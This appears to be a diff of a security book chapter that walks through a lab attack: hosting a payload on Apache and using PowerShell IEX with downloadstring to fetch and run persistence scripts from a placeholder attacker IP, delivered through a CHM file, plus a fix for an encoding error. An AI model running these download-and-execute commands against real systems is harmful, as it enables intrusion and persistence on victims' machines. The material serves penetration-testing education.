holisticinfosec/HolisticInfoSec-For-WebDevelopers-Fascicle1/manuscript/markdown/main/chapter7.md

 G> 2.
 Host `powershell_hacking.bat` as `/var/www/html/payload.txt`
 G> As in the previous plays, Start your web server if it is not still running:
 G> `Service apache2 start`
-G> I tried downloading and `I`nvoking `EX`pression from ISE using both:
+G> I tried downloading and `I`nvoking `EX`pression from ISE using both

 {linenos=off, lang=PowerShell}
     IEX ((new-object net.webclient).downloadstring('http://<listener-attack-ip>/Persistence.ps1 '))
-    # and:
+    # and
     IEX ((new-object net.webclient).downloadstring('http://<listener-attack-ip>/EncodedPersistentScript.ps1 '))

 {icon=bomb}
-G> before doing the same by running the `doc.chm` we create below.
+G> before doing the same thing when running the `doc.chm` we create below.
 Both `Persistence.ps1` and `EncodedPersistentScript.ps1` gave me problems initially.
 It turned out that the actual file encoding of both files was not right.
 If you just copy either of the files from your Windows attack VM to your hosting directory on your Kali Linux VM, you may have the same issue.
-I ended up creating a new file in the hosting location and copy->pasting the file contents into the new file, and that worked. the first part of the error from `IEX` in ISE for `Persistence.ps1` was:
+I ended up creating a new file in the hosting location and copy->pasting the file contents into the new file, which worked successfully.
+The first part of the error from `IEX` in ISE for `Persistence.ps1` was:
 G>
 G> `The term 'ÿþf u n c t i o n ' is not recognized as the name of a cmdlet, function, script file, or operable program.
 Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
 At line:1 char:19`
 G>